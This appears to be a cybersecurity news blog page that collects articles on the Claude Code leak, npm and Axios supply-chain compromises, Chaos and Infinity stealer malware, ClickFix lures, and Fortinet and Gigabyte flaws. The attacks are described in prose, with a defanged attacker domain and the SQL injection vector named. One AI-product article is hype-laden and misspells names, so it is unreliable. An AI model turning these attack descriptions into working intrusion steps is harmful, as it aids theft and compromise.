Search This Blog

Powered by Blogger.

Blog Archive

Labels

Footer About

Footer About

Labels

Anthropic's Claude Code Leak: 500K Lines Exposed

 

On March 31, 2026, Anthropic, the safety-focused AI company behind Claude, accidentally leaked over 500,000 lines of proprietary source code for its Claude Code tool through a public npm package update. This incident, the second such breach in a year, exposed nearly 2,000 TypeScript files via a misincluded debugging file in version 2.1.88, which linked to a publicly accessible zip archive on Anthropic's Cloudflare storage.Security researcher Chaofan Shou quickly spotted the error, sparking rapid mirroring on GitHub where repositories amassed thousands of stars before takedowns. 

The leak revealed Claude Code's full architecture, including 44 feature flags for unreleased capabilities like a "persistent assistant" that runs in the background even when users are inactive. Other hidden gems included session review for performance improvement across conversations, remote control from mobile devices, and a roadmap toward longer autonomous tasks, enhanced memory, and multi-agent collaboration. Developers also uncovered internal tools, prompts, and even a "pet system" codenamed Buddy with species and rarity tiers, hinting at gamified enterprise features. 

Anthropic swiftly responded, calling it "human error" in a release packaging issue, not a security breach, with no sensitive data exposed. The company issued over 8,000 DMCA takedown requests to platforms like GitHub, removing thousands of forks within days. Claude Code creator Boris Cherny confirmed a skipped manual deploy step caused the mishap, and Anthropic pledged process improvements to prevent recurrence. 

This incident underscores vulnerabilities in AI firms' deployment pipelines, especially for a lab positioning itself as security-conscious amid IPO preparations. Competitors now gain insights into production-grade AI coding agents, potentially accelerating their own developments in agent orchestration and tools. While unlikely to derail Anthropic's $340 billion valuation, it highlights how securing AI systems rivals defending against AI-powered threats. 

Ultimately, the Claude Code leak serves as a stark reminder for the AI industry to fortify internal safeguards as innovations race ahead. It boosts hype around Anthropic's capabilities while exposing the human element in high-stakes tech releases. As external developers reverse-engineer remnants, the focus shifts to ethical use and robust verification in open-source ecosystems.

Axios Supply Chain Attack Exposes npm Security Gaps with Token-Based Compromise

 

A breach in the Axios library - one of many relied upon in modern web development - has exposed flaws that linger beneath surface-level fixes. Through stolen access, hackers slipped harmful updates into what users assumed was safe code. This event underscores how fragile trust can be, even when systems claim stronger defenses. Progress in verifying packages and securing logins appears incomplete, given such exploits still succeed. Confidence in tools like those hosted on npm remains shaken by failures that feel both avoidable and familiar. 

A lead developer’s extended-use npm token was accessed by hackers, reports show from Huntress and Wiz. Through this entry point, altered builds of Axios emerged - versions laced with hidden code deploying a multi-system remote control tool. Not limited to one environment, the harmful update reached machines running on macOS, Windows, or Linux setups. Lasting just under three hours, the rogue releases stayed active online until taken down. 

Axios ranks among the top tools in JavaScript, downloaded more than a hundred million times each week, found in roughly eight out of ten cloud setups. Moments after the tainted update went live, malware started spreading fast; Huntress later verified infection on 135 machines while the vulnerability was active. Hidden within a third-party addition, plain-crypto-js slipped into Axios’s environment without touching its main codebase. Not through direct changes but via a concealed payload activated after installation. 

Running quietly once set up, it triggered deployment of a remote access tool on developers’ systems. Built to avoid notice, the malicious code erased itself under certain conditions. Altered components were restored automatically, masking traces left behind. One reason this breach stands out lies in its method - evading defenses thought secure. Even after adopting standard safeguards like OIDC for verified publishing and robust supply chain models, outdated tools remained active. 

A leftover npm access key opened the door despite stronger systems being in place. Where two login paths existed, preference went to the original token, rendering recent upgrades useless under that condition. This is now the third significant breach of the npm supply chain in just a few months, after events such as the Shai-Hulud incident. 

Each time, hackers used compromised maintainer login details to gain access, revealing a recurring weakness across the system. Though security professionals highlight benefits of measures like multi-factor verification and origin monitoring, these fail to block every threat when login data is exposed. 

With growing pressure, companies must examine third-party links, apply tighter rules on software setup, yet phase out outdated access methods instead. When trust rests on open-source tools, weaknesses in how credentials are handled can still invite breaches. A single event shows flaws aren’t always in the code itself - sometimes they hide where access is managed.

Arbitrary File Write Bug in Gigabyte Control Center Sparks Security Alerts


 

It is becoming increasingly apparent that trusted system utilities are embedded with persistent security risks, as GIGABYTE Control Center, a widely deployed Windows-based management tool that is packaged with select devices, has been put under scrutiny following the disclosure of a critical security flaw. 

Inadvertently, the software designed to give users centralized control over essential hardware functions exposed a potential pathway for threat actors to alter system behavior on a fundamental level. Despite the fact that the vulnerability has been addressed, it is potential to exploit it in order to execute unauthorized code, write arbitrary files, and potentially disrupt system availability through denial-of-service. 

Since the utility is deeply entwined with device operations and is installed on GIGABYTE motherboards, the vulnerability has significant implications for users as well as enterprises, making it increasingly important to deploy patches and harden systems in a timely manner. Software vulnerable to this vulnerability is GIGABYTE Control Center, which is pre-installed on all laptops and supported motherboards, serving as a central point of configuration and oversight for the entire system.

Integrated with Windows, it provides a comprehensive set of operational controls for monitoring and managing hardware, adjusting thermal and fan curves, optimizing performance, customizing RGB lighting, and installing driver and firmware updates. 

The broad access to underlying system functions, which is intended to enhance user convenience, amplifies the potential impact of any vulnerabilities in the system. There is a particular concern regarding an integrated "pairing" feature designed to facilitate communication between host systems and external devices or services over a network. 

When enabled in versions of Control Center up to and including 25.07.21.01, this function significantly expands the application's interaction surface. Thus, it introduces a vulnerability that can be exploited under specific circumstances, increasing the attack surface of affected systems by creating a network-exposed vector. It is this feature that makes it an important focal point when assessing the overall risk profile associated with the vulnerability because it is linked to elevated system privileges and network-enabled communication. 

According to additional technical analysis, the issue may be related to the vulnerability CVE-2026-4415, which has a rating of 9.2 under CVSS 4.0 framework, and has been identified within the pairing mechanism within GIGABYTE Control Center versions 25.07.21.01 and earlier. As a result of insufficient safeguards regarding how the application handles network-initiated interactions, David Sprüngli is credited with discovering the vulnerability. 

The pairing feature provides an opportunity for unauthenticated remote actors to write arbitrary files across the system's file structure when it is active. With the utility's elevated privileges and close integration with system processes, such access is potentially useful for the execution of remote code, escalation of privileges, or disruption of system availability. 

A particularly concerning aspect of the vulnerability is its ability to bypass conventional trust boundaries, effectively creating a potential attack vector from a legitimate management feature. A new version of GIGABYTE's Control Center has been released, titled 25.12.10.01, which introduces a series of corrections across multiple functional layers, including download handling routines, message validation processes, and command-level encryption, as well as corrective measures for multiple functional layers. In combination, these enhancements mitigate the risks associated with the exposed pairing interface. 

According to the company's advisory, users should update immediately and obtain the patched version only through official software distribution channels, thereby reducing the possibility of compromised or tampered installers occurring. Such incidents reinforce the importance of treating vendor-supplied utilities the same way we'd treat any externally sourced software, especially when they're elevated privileges and have network access. 

The company and individual users should both adopt a proactive patch management strategy, audit pre-installed applications on a regular basis, and disable features not specifically required for use, such as remote pairing. The implementation of multiple security controls, including endpoint monitoring, network segmentation, and strict access policies, can significantly reduce exposure to similar threats. 

The integration of hardware ecosystems and software-driven management layers becomes increasingly complex, so maintaining vigilance over these trusted components is crucial to maintaining the integrity of the overall system.

New Chaos Malware Variant Expands to Cloud Targets, Introduces Proxy Capability

 



A newly observed version of the Chaos malware is now targeting poorly secured cloud environments, indicating a defining shift in how this threat is being deployed and scaled.

According to analysis by Darktrace, the malware is increasingly exploiting misconfigured cloud systems, moving beyond its earlier focus on routers and edge devices. This change suggests that attackers are adapting to the growing reliance on cloud infrastructure, where configuration errors can expose critical services.

Chaos was first identified in September 2022 by Lumen Black Lotus Labs. At the time, it was described as a cross-platform threat capable of infecting both Windows and Linux machines. Its functionality included executing remote shell commands, deploying additional malicious modules, spreading across systems by brute-forcing SSH credentials, mining cryptocurrency, and launching distributed denial-of-service attacks using protocols such as HTTP, TLS, TCP, UDP, and WebSocket.

Researchers believe Chaos developed from an earlier DDoS-focused malware strain known as Kaiji, which specifically targeted exposed Docker instances. While the exact operators behind Chaos remain unidentified, the presence of Chinese-language elements in the code and the use of infrastructure linked to China suggest a possible connection to threat actors from that region.

Darktrace detected the latest variant within its honeypot network, specifically on a deliberately misconfigured Hadoop deployment that allowed remote code execution. The attack began with an HTTP request sent to the Hadoop service to initiate the creation of a new application.

That application contained a sequence of shell commands designed to download a Chaos binary from an attacker-controlled domain, identified as “pan.tenire[.]com.” The commands then modified the file’s permissions using “chmod 777,” allowing full access to all users, before executing the binary and deleting it from the system to reduce forensic evidence.

Notably, the same domain had previously been linked to a phishing operation conducted by the cybercrime group Silver Fox. That campaign, referred to as Operation Silk Lure by Seqrite Labs in October 2025, was used to distribute decoy documents and ValleyRAT malware, suggesting infrastructure reuse across campaigns.

The newly identified sample is a 64-bit ELF binary that has been reworked and updated. While it retains much of its original functionality, several features have been removed. In particular, capabilities for spreading via SSH and exploiting router vulnerabilities are no longer present.

In their place, the malware now incorporates a SOCKS proxy feature. This allows compromised systems to relay network traffic, effectively masking the origin of malicious activity and making detection and mitigation more difficult for defenders.

Darktrace also noted that components previously associated with Kaiji have been modified, indicating that the malware has likely been rewritten or significantly refactored rather than simply reused.

The addition of proxy functionality points to a broader monetization strategy. Beyond cryptocurrency mining and DDoS-for-hire operations, attackers may now leverage infected systems to provide anonymized traffic routing or other illicit services, reflecting increasing competition within cybercriminal ecosystems.

This shift aligns with a wider trend observed in other botnets, such as AISURU, where proxy services are becoming a central feature. As a result, the threat infrastructure is expanding beyond traditional service disruption to include more complex abuse scenarios.

Security experts emphasize that misconfigured cloud services, including platforms like Hadoop and Docker, remain a critical risk factor. Without proper access controls, attackers can exploit these systems to gain initial entry and deploy malware with minimal resistance.

The continued evolution of Chaos underlines how threat actors are persistently enhancing their tools to expand botnet capabilities. It also reinforces the need for continuous security monitoring, as changes in how APIs and services function may not always appear as direct vulnerabilities but can exponentially increase exposure.

Organizations are advised to regularly audit configurations, restrict unnecessary access, and monitor for unusual behavior to mitigate the risks posed by increasingly adaptive malware threats.

Apple Reinforces Digital Privacy for Users Without Restricting Law Enforcement Oversight


 

The company has long positioned its privacy architecture as a defining aspect of its ecosystem, marketing it as more than a feature, but a fundamental right built into its products as well. However, the latest disclosures emerging from US legal proceedings suggest that privacy boundaries are neither absolute nor impermeable, and that a more nuanced reality emerges. 

It is the "Hide My Email" function that is under scrutiny, a tool designed to hide users' real email addresses from third-party apps and websites. Despite its success in minimizing commercial tracking and unsolicited exposure, recent legal revelations indicate that this layer of anonymity can be effectively reversed under lawful authority to ensure effectiveness. 

Moreover, the development highlights the important distinction between consumer privacy assurances and judicial obligations imposed by technology companies, reframing conditional anonymity as a controlled filter operating within clearly defined legal limits rather than as a cloak of invisibility. 

Subsequent disclosures from investigative proceedings provide additional insight into how this conditional anonymity works in practice. Apple has received a request from federal authorities, including the Federal Bureau of Investigation, for subscriber information regarding a threatening communication directed at Alexis Wilkins, a person who was reported to have been associated with FBI Director Kash Patel.

According to the warrant application, Apple was able to correlate the anonymized "Hide My Email" alias to a specific user account by providing details on subscriber identification along with a wider dataset that contained over a hundred additional aliases created under the same profile. It was found that Homeland Security Investigations investigated an alleged identity fraud operation in a similar manner, in which multiple masked email identities were linked to Apple accounts under underlying identity fraud schemes, allowing investigators to consolidate disparate digital footprints into one framework for attribution. 

Collectively, these examples reveal an important structural aspect of Apple's ecosystem: while certain layers of iCloud services are protected by end-to-end encryption, a portion of account and communication information is still accessible under valid legal processes. Despite the fact that subscriber information, including names, billing credentials, and associated identifiers, remains within the compliance boundary rather than a cryptographic boundary, which does not contain end-to-end encryption of the content. 

The delineation reinforces an issue of broader significance to the industry, in which conventional email infrastructure is built without pervasive encryption safeguards, making it inherently vulnerable to lawful interception by its users. It is against this backdrop that privacy-conscious individuals are increasingly turning to platforms such as Signal, which offer default end-to-end encryption and minimal data retention. 

As for Apple, it has not responded directly to these developments, although the disclosures have prompted a review of how privacy assurances are communicated and understood within technologically advanced and legally obligated environments. A sustained increase in government access requests against major technology providers is reflective of the context in which these disclosures are made. 

According to Apple's transparency data, it processed more than 13,000 such requests for customer information during the first half of 2025, with email-related records contributing significantly to account attribution, threat analysis, and criminal investigations due to their evidentiary value. Nevertheless, this dynamic is not limited to Apple's ecosystem.

Similar constraints exist among providers such as Google and Microsoft, where legacy email protocols - architected in an era before modern encryption standards - continue to limit the amount of privacy protection inherent within their systems. Although niche services such as Proton have attempted to address this issue by implementing end-to-end encryption by design, their adoption remains marginal relative to the global email user base, which underscores the persistence of structurally exposed communication channels within this environment. 

Apple’s position is especially interesting in light of the divergence between its privacy-oriented messaging and its email infrastructure's technical realities. Hide My Email provides demonstrably reduced exposure to commercial tracking and data aggregation, however it does not alter the underlying compliance model governing lawful data access. 

The distinction has re-ignited an ongoing policy debate around encryption, a controversy Apple has previously encountered with the use of iMessage and other Apple services. Regulations and law enforcement agencies contend that inaccessible communications impede legitimate investigations, and extending comparable end-to-end encryption to iCloud Mail may result in renewed friction.

In contrast, privacy advocates contend that any lowering of encryption standards introduces systemic security risks. Thus, email privacy remains a compromise governed both by legal frameworks as well as engineering decisions at present. 

It is common for users seeking stronger privacy to rely on specialized encryption platforms, but such platforms present usability constraints and interoperability challenges with the larger email ecosystem. There is an important distinction to be drawn from recent federal requests: privacy controls designed to limit the visibility of corporate data do not automatically ensure that government access is restricted. 

The implementation of Apple's products is within this boundary, balancing user expectations with statutory obligations. However, there remains a considerable gap between perceptions and operational realities that calls for reevaluation. It is unclear if the company will extend its end-to-end encryption model to email services, particularly in light of the political and regulatory implications of such a shift. 

It is important to note that privacy is not a binary guarantee, but rather a layered construct that is shaped by both technical design and legal jurisdiction as a result of the developments. As such, organizations and individuals alike should reassess their threat models, identifying clearly between protections required for sensitive communications as opposed to protections against commercial data exposure. 

In cases where confidentiality is extremely important, standard email services may be insufficient, which necessitates selective adoption of stronger encryption techniques, secure communication channels, and disciplined data handling procedures. As a result of clear, and often misunderstood, boundaries within which privacy features operate, informed usage remains the most reliable safeguard in an environment where privacy features operate within clearly defined boundaries.

How Duck.ai Offer Better Privacy Compared to Commercial Chatbots


Better privacy with DuckDuckGo's AI bot

Privacy issues have always bothered users and business organizations. With the rapid adoption of AI, the threats are also rising. DuckDuckGo’s Duck.ai chatbot benefits from this.

The latest report from Similarweb revealed that traffic to Duck.ai increased rapidly last month. The traffic recorded 11.1 million visits in February 2026, 300% more than January. 

Duck.ai's sudden traffic jump

The statistics seem small when compared with the most popular chatbots such as ChatGPT, Claude, or Gemini. 

Similarweb estimates that ChatGPT recorded 5.4 billion visits in February 2026, and Google’s Gemini recorded 2.1 billion, whereas Claude recorded 290.3 million. 

For DuckDuckGo, the numbers show a good sign, as the bot was launched as beta in 2025, and has shown a sharp rise in visits. 

DuckDuckGo browser is known for its privacy, and the company aims to apply the same principle to its AI bot. Duck.ai doesn't run a bespoke LLM, it uses frontier models from Meta, Anthropic, and OpenAI, but it doesn't expose your IP address and personal data. 

Duck.ai's privacy policy reads, "In addition, we have agreements in place with all model providers that further limit how they can use data from these anonymous requests, including not using Prompts and Outputs to develop or improve their models, as well as deleting all information received once it is no longer necessary to provide Outputs (at most within 30 days, with limited exceptions for safety and legal compliance),”

Duck.ai is famous now

What is the reason for this sudden surge? The bot has two advantages over individual commercial bots like ChatGPT and Gemini, it offers an option to toggle between multiple models and better privacy security. The privacy aspect sets it apart. Users on Reddit have praised Duck.ai, one person noting "it's way better than Google's," which means Gemini. 

Privacy concerns in AI bots

In March, Anthropic rejected a few applications of its technology for mass surveillance and weapons submitted by the Department of Defense. The DoD retaliated by breaking the contract. Soon after, OpenAI stepped in. 

The incident stirred controversies around privacy concerns and ethical AI use. This explains why users may prefer chatbots like Duck.ai that safeguard user data from both the government and the big tech. 

Infiniti Stealer Targets Mac Users with ClickFix Social Engineering Attack

 

Not stopping at typical malware tricks, Infiniti Stealer targets Macs using clever social manipulation instead of system flaws. Security firm Malwarebytes uncovered the operation, highlighting how it dodges standard protection tools. Once inside, the software slips under the radar easily. What stands out is its reliance on tricking users, not breaking through digital walls. 

Starting off, attackers rely on a technique called ClickFix, tricking people into running harmful software without realizing it. Instead of clear warnings, users land on fake websites designed to look real - usually through deceptive emails or infected links. These pages imitate trusted security checks used by Cloudflare, copying their layout closely. A common "I am not a robot" checkbox shows up first. Then comes misleading directions hidden inside what seems like normal steps. Though simple at glance, each piece nudges victims toward unintended actions.  

Spotlight pops up when users start the process, guiding them toward finding Terminal. Once there, they run an unfamiliar line of code by pasting it directly. What seems like a small task hides its real intent - execution happens under human control, so security tools often stand down. The trick works because actions led by people rarely trigger alarms, even if those actions carry risk. Hidden behind normal behavior, the command slips through defenses without raising flags. 

Execution triggers installation of Infiniti Stealer onto the system. Though built in Python, it becomes a standalone macOS executable through compilation with Nuitka. Because of this conversion, detection by security software weakens. Analysis grows more difficult when facing such repackaged threats instead of standard interpreted scripts. Stealth improves simply by changing how the code runs.  

Once installed, it starts pulling private details from the compromised device. Things like stored login credentials, web history including cookies, snapshots of screens appear among what gets gathered. From there, the data flows toward remote machines managed by hackers - opening doors to hijacked accounts or stolen identities. What leaves the machine often fuels more invasive misuse downstream. What stands out is how this campaign signals a change in the way attackers operate. 

Moving away from technical flaws or harmful file attachments, they now lean heavily on manipulating people’s actions - especially by abusing their confidence in everyday website features such as CAPTCHA challenges. When unsure, steer clear of directions from unknown online sources - particularly if they involve running Terminal commands. Real authentication processes never ask people to enter scripts into core system utilities. 

When signs of infection appear, stop using the device without delay. Security professionals suggest changing credentials through an unaffected system right away. Access tokens tied to the infected hardware should be invalidated promptly. A different machine must handle these updates to prevent further exposure.

Critical Fortinet FortiClient EMS Flaw Now Actively Exploited in Cyberattacks

 

A critical vulnerability in Fortinet’s FortiClient EMS platform is now being actively exploited in real‑world attacks, according to threat‑intelligence firm Defused. Tracked as CVE‑2026‑21643, this SQL injection bug affects FortiClient EMS version 7.4.4 and allows unauthenticated attackers to run arbitrary code or commands through the platform’s web interface. The flaw can be triggered by specially crafted HTTP requests that smuggle malicious SQL statements via the Site header, giving an attacker a powerful foothold on unpatched systems. 

Modus operandi 

The vulnerability lives in the FortiClient EMS GUI, which organizations use to manage and deploy Forticlient endpoints across their networks. By manipulating the Site header in an HTTP request, an attacker can inject SQL code into the back‑end database, bypassing authentication entirely. This “low‑complexity” attack vector means that even unsophisticated adversaries can weaponize the bug if they can reach the exposed web interface. Because the flaw is critical, it can lead to full system compromise, data theft, or a springboard into a broader corporate network. 

Defused reported that it observed the first exploitation of CVE‑2026‑21643 just four days after the initial vulnerability disclosures. The firm noted that over 900 FortiClient EMS instances are publicly exposed on the internet according to Shodan data, giving attackers a large pool of potential targets. Meanwhile, Internet‑security watchdog Shadowserver is tracking more than 2,000 exposed FortiClient EMS web interfaces, with over 1,400 IPs located in the United States and Europe. Despite this, Fortinet has not yet updated its advisory to mark the bug as “exploited in the wild,” even though a local media outlet reached out to confirm active attacks. 

Fortinet vulnerabilities have repeatedly been abused in ransomware and cyber‑espionage campaigns, often as zero‑days while patches are still rolling out. In the case of FortiClient EMS, prior SQL injection flaws were exploited in ransomware attacks and by state‑sponsored groups such as China’s “Salt Typhoon” to breach telecom providers. CISA has already flagged 24 Fortinet vulnerabilities as known‑exploited, 13 of which were tied directly to ransomware. That history makes this new FortiClient EMS bug a high‑priority item for organizations relying on Fortinet for endpoint security.

Mitigation tips 

Fortinet recommends upgrading affected FortiClient EMS systems to version 7.4.5 or later to close the CVE‑2026‑21643 vulnerability. Organizations should also review their internet‑exposed EMS interfaces and, where possible, restrict access behind VPNs or firewalls instead of leaving the GUI wide open online. In parallel, IT and security teams should hunt for anomalous database or system‑level activity that might indicate prior exploitation, such as unexpected command execution or lateral movement from the EMS server. Given Fortinet’s track record as a prime target for ransomware actors, patching this flaw quickly and validating exposure can significantly reduce the risk of a major breach.

Infinity Stealer Targets macOS Using ClickFix Trick and Python-Based Malware

 

A newly identified information-stealing malware, dubbed Infinity Stealer, is targeting macOS users through a sophisticated attack chain that blends social engineering with advanced evasion techniques. Security researchers at Malwarebytes report that this is the first known campaign combining the ClickFix technique with a Python-based payload compiled using the Nuitka compiler. The attack begins with a deceptive prompt designed to resemble a legitimate human verification step from Cloudflare. Victims are presented with a fake CAPTCHA and instructed to paste a command into the macOS Terminal to complete the verification. This method, known as ClickFix, tricks users into bypassing built-in operating system protections by executing malicious commands themselves. 

Once the command is executed, it decodes a hidden script that downloads and launches the next stage of the malware. The payload is compiled into a native macOS binary using Nuitka, which converts Python code into C-based executables. This approach makes the malware significantly harder to detect and analyze compared to traditional Python-based threats that rely on bytecode packaging tools. The infection chain unfolds in multiple stages. After the initial script runs, it installs a loader that extracts the final malware payload. Before initiating its malicious activities, the malware performs checks to determine whether it is running in a virtual or sandboxed environment, helping it evade detection by security tools.  

Once active, Infinity Stealer begins harvesting sensitive information from the infected system. This includes login credentials stored in Chromium-based browsers and Firefox, entries from the macOS Keychain, cryptocurrency wallet data, and plaintext secrets found in developer files such as .env configurations. It can also capture screenshots, adding another layer of data collection. The stolen information is then transmitted to attacker-controlled servers via HTTP requests. 

Additionally, notifications are sent through Telegram to alert threat actors when data exfiltration is complete, enabling real-time monitoring of compromised systems. Researchers warn that this campaign highlights the growing sophistication of threats targeting macOS, a platform often perceived as more secure. The use of social engineering combined with advanced compilation techniques demonstrates how attackers are evolving their methods to bypass traditional defenses. Users are strongly advised to avoid executing unknown commands in Terminal, especially those obtained from untrusted sources, as such actions can directly compromise system security.

Malware Hidden in Blockchain Networks Is Quietly Targeting Developers Worldwide



A new investigation has uncovered a cyberattack method that uses blockchain networks to quietly distribute malware, raising concerns among security researchers about how difficult it may be to stop once it spreads further.

The threat first surfaced when a senior engineering executive at Crystal Intelligence received a freelance opportunity through LinkedIn. The message appeared routine, asking him to review and run code hosted on GitHub. However, the request resembled a known tactic used by a North Korean-linked group often referred to as Contagious Interview, which relies on fake job offers to target developers.

Instead of proceeding, the executive examined the code and found something unusual. Hidden within it was the beginning of a multi-step attack designed to look harmless. A developer following normal instructions would likely execute it without noticing anything suspicious.

Once activated, the code connects to blockchain networks such as TRON and Aptos, which are commonly used because of their low transaction costs. These networks do not contain the malware itself but instead store information that directs the program to another blockchain, Binance Smart Chain. From there, the final malicious payload is retrieved and executed.

Researchers say this last stage installs a powerful data-stealing tool known as “Omnistealer.” According to analysts working with Ransom-ISAC, the malware is designed to extract a wide range of sensitive data. It can access more than 60 cryptocurrency wallet extensions, including MetaMask and Coinbase Wallet, as well as over 10 password managers such as LastPass. It also targets major browsers like Chrome and Firefox and can pull data from cloud storage services like Google Drive. This means attackers are not just stealing cryptocurrency, but also login credentials and internal access to company systems.

What initially looked like a simple phishing attempt turned out to be far more layered. By placing parts of the attack inside blockchain transactions, the attackers have created a system that is extremely difficult to dismantle. Data stored on blockchains cannot easily be removed, which means parts of this malware infrastructure could remain accessible for years.

Researchers believe the scale of this operation could grow rapidly. Some have compared its potential reach to the WannaCry ransomware attack, which disrupted hundreds of thousands of systems worldwide. In this case, however, the method is quieter and more flexible, which may allow it to spread further before being detected. At the same time, investigators are still unsure what the attackers ultimately intend to do with the access they gain.

Further analysis has revealed possible links to North Korean cyber actors. Investigators traced parts of the activity to an IP address in Vladivostok, a location that has previously appeared in investigations involving North Korean operations. Research cited by NATO has noted that North Korea expanded its internet routing through Russia several years ago. Additional findings from Trend Micro connect similar infrastructure to earlier campaigns involving fake recruiters.

The number of affected victims is already significant. Researchers estimate that around 300,000 credentials have been exposed so far, although they believe the real figure could be much higher. Impacted organizations include cybersecurity firms, defense contractors, financial companies, and government entities in countries such as the United States and Bangladesh.

The attackers rely heavily on deception to gain access. In some cases, they pose as recruiters and convince developers to run infected code as part of a hiring process. In others, they present themselves as freelance developers and introduce malicious code directly into company systems through platforms like GitHub.

Developers in rapidly growing tech ecosystems appear to be a key focus. India, for example, has seen a surge in new contributors on GitHub and ranks among the top countries for cryptocurrency adoption. Researchers suggest that a combination of high developer activity and economic incentives may make such regions more vulnerable to these tactics.

Initial contact is typically made through platforms such as LinkedIn, Upwork, Telegram, and Discord. Representatives from these platforms have advised users to be cautious, particularly when asked to download files or execute unfamiliar code outside controlled environments.

Not all targeted organizations appear strategically important, which suggests the attackers may be casting a wide net. However, the presence of defense and security-related entities among the victims raises more serious concerns about potential intelligence-gathering objectives.

Security experts say this campaign reflects a broader shift in how attacks are being designed. Instead of relying on a single point of failure, attackers are combining social engineering, publicly accessible code platforms, and decentralized infrastructure. The use of blockchain in particular adds a layer of persistence that traditional security tools are not designed to handle.

As investigations continue, researchers warn that this may only be an early stage of a much larger problem. The combination of hidden delivery methods, long-term persistence, and unclear intent makes this campaign especially difficult to predict and contain.

Cyber Attacks Threatening Global Digital Landscape, Affecting Human Lives


Cyberattack campaigns have increased against critical infrastructure like power grids, healthcare, and energy. 

Cyber warfare and global threat

The global threat landscape has shifted from data theft to threats against human lives. The convergence of Operational Technology (OT) and Information Technology (IT) has increased the attack surface, exposing sectors like public utilities, aviation, and transport to outsider risks. 

According to Gaurav Shukla, cybersecurity expert at Deloitte South Asia, “For the past two years, we observed that cyber threats were not limited only to the IT systems. They were pervading beyond IT systems, and the perpetrators were targeting more of the critical infrastructure.” 

Change in digital landscape

Digital transformation in recent years has increased the attack surface, providing more opportunities for threat actors to compromise critical infrastructure. “

"If you are driving a connected car on a highway at 120 km/h and suddenly find the steering is no longer in your control, you are not going to be worried about how much money is in your bank account. You are worried about the danger to your life,” Shukla added. 

How dangerous can it be?

For instance, an attack on a medical device compromising patient information can be dangerous, whereas a cyber attack on power grids and the transmission sector can result in countrywide blackouts.

Rise in connected devices

The world population of eight billion is currently surrounded by more than 30 billion IoT sensors. This means that, on average, a person is surrounded by more than 3.5 sensors. 

India’s Digital Public Infrastructure

India’s Digital Public Infrastructure, aka India Stack, has become a global benchmark. According to experts, Deloitte has suggested that 24 countries adopt their own framework for the India Stack. Shukla has warned that as DPI reaches beyond identity and payments to include education and healthcare, the convergence points create new threats. DPI accounts for around 80% of India’s digital transactions in January 2026.

Attackers' use of artificial intelligence (AI) increases the speed and scope of their attacks. Thus, ongoing testing against supply chain problems and AI-related risks will be extremely important, he continued.

Cyberwarfare is continuous, demanding ongoing cooperation between businesses, academics, and the government, whereas kinetic wars are time-bound. “Much like you need a language to build a foundation, awareness of cybersecurity and privacy is going to be just as important,” Shukla added. 

Claude Mythos 5: Trillion-Parameter AI Powerhouse Unveiled

 

Anthropic has launched Claude Mythos 5, a groundbreaking AI model boasting 10 trillion parameters, positioning it as a leader in advanced artificial intelligence capabilities. This massive scale enables superior performance in demanding fields like cybersecurity, coding, and academic reasoning, surpassing many competitors in handling complex, high-stakes tasks. 

Alongside it, the mid-tier Capabara model offers efficient versatility, bridging the gap between flagship power and practical deployment, with Anthropic emphasizing a phased rollout for ethical safety. Claude Mythos 5's model excels in precision and adaptability, making it ideal for cybersecurity threat detection and intricate software development where accuracy is paramount. In academic reasoning, it tackles multifaceted problems that require deep logical inference, outpacing previous models in benchmark tests. 

Anthropic's commitment to responsible AI ensures these tools minimize risks like misuse, aligning innovation with accountability in real-world applications. Complementing Anthropic's releases, GLM 5.1 emerges as a key open-source milestone, excelling in instruction-following and multi-step workflows for automation tasks. Though not the fastest, its reliability fosters community-driven innovation, providing accessible alternatives to proprietary systems for developers worldwide. This model democratizes AI progress, enabling collaborative advancements without the barriers of closed ecosystems. 

Google DeepMind's Gemini 3.1 advances real-time multimodal processing for voice and vision, enhancing latency and quality in sectors like healthcare and autonomous systems. OpenAI's revamped Codeex platform introduces plug-in ecosystems with pre-built workflows, streamlining coding and boosting developer productivity. Meanwhile, the ARC AGI 3 Benchmark sets a rigorous standard for agentic reasoning, combating overfitting and driving genuine AI intelligence gains. 

These developments, including Mistral AI’s expressive text-to-speech and Anthropic’s biology-focused Operon, signal AI's transformative potential across industries. From ethical trillion-parameter giants to open benchmarks, they promise efficiency in research, automation, and creative workflows. As AI evolves rapidly, balancing power with safety will shape a future of innovative problem-solving.

Generative AI Expanding Capabilities of Fraud and Social Engineering Attacks


 

In the past, the quiet integration of generative artificial intelligence into financial systems has been framed as a story of optimizing and scaling. However, in the digital banking industry, generative AI is now being rewritten in terms that are much more urgent. 

It is influencing not only the dynamics of fraud, but the way institutions operate as well, forcing them to rethink how they protect themselves as well. Those technologies that once promised frictionless customer experiences as well as operational precision are now being repurposed by malicious actors with unsettling efficiency, allowing deception to take place with unprecedented realism and speed that traditional safeguards are unprepared to handle.

Due to this, fraud is no longer merely an external threat that must be dealt with; it is now an adaptive, intelligence-driven force embedded within the digital ecosystem that requires banks to continuously reevaluate their security posture while maintaining the fragile trust that underpins modern financial transactions. This shift has been accelerated by the rapid maturation of generative artificial intelligence capabilities, which was initially underestimated by even the most experienced security practitioners.

A number of tools, including large language models, were capable of generating passable but largely generic phishing content in the early stages of widespread adoption. However, they were unable to provide contextual precision or psychological nuance required for high impact attacks. Despite long being regarded as a domain characterized by human intuition, reconnaissance, and carefully constructed deception, full automation appears to have remained problematic. Nevertheless, technological advances have sharply increased in recent years.

Modern models have evolved beyond static datasets and now include real-time retrieval of information, while AI agents are becoming increasingly sophisticated and capable of orchestrating a wide variety of workflows, from data aggregation to targeted messages. In light of these developments, the threat landscape has materially changed. 

 A highly personalised attack narrative, previously requiring deliberate human effort to construct, can be built rapidly and scaleably using publicly available digital footprints and behavioral cues. The concept of fully automated, precision-driven social engineering is no longer theoretical in this context.

Instead of representing an emerging operational reality, it represents an emerging operational reality that requires threat actors only to initiate the process, leaving adaptive AI systems to refine and execute campaigns with a level of consistency and reach that significantly increases the frequency and effectiveness of fraud attempts. 

Modern artificial intelligence systems have advanced the analytical and generative capabilities of social engineering, enabling a significant proportion of successful intrusions to be carried out with this tactic. These models are capable of building highly contextualised engagement vectors which reflect the authentic communication patterns of corporations, social media platforms, and professional networks by systematically harvesting and correlating publicly accessible data across corporate websites, social media platforms, and professional networks. 

Consequently, phishing and business email compromise attempts are now more sophisticated than they were before, as they replicate internal correspondence, vendor interactions, and executive directives with a degree of authenticity that challenges conventional scrutiny in both linguistics and situationality. 

By allowing adversaries to seamlessly operate across geographically dispersed organizations, multilingual generation further extends the reach of such campaigns. Moreover, there has been an increase in synthetic media techniques, including voice cloning and artificial intelligence-generated audio, that are increasingly being deployed in real-time impersonation attacks, especially in cases where trust is high, such as financial authorizations and executive communications. 

